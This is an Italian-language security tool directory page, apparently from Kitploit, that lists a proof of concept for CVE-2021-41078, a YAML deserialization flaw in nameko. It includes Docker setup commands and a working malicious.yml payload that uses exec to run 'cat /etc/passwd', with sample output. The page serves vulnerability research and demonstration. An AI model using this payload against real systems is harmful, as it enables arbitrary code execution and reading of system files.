Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/s-index/cve-2021-41078
Generazione di PayloadAnalisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebConfigurazione Errata
GitHubs-index/cve-2021-41078

CVE-2021-41078

nameko Esecuzione di codice arbitrario dovuta alla deserializzazione YAML

Vedi Repository
74 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-41078

nameko Esecuzione di codice arbitrario dovuta alla deserializzazione YAML

Descrizione NVD

Nameko fino alla versione 2.13.0 può essere indotto a eseguire codice arbitrario durante la deserializzazione del file di configurazione.

Demo

cve-2021-41078

Configurazione

  1. Crea un'immagine da un Dockerfile
root@kitploit:~
docker build -t cve-2021-41078 .
  1. Esegui python main.py in un nuovo container
root@kitploit:~
docker run -it --rm cve-2021-41078

output di /etc/passwd

root@kitploit:~
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
-- snip --

output-image

Payload PoC

malicious.yml

root@kitploit:~
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"

Riferimenti

  • https://github.com/nameko/nameko/security/advisories/GHSA-6p52-jr3q-c94g
Scarica lo strumento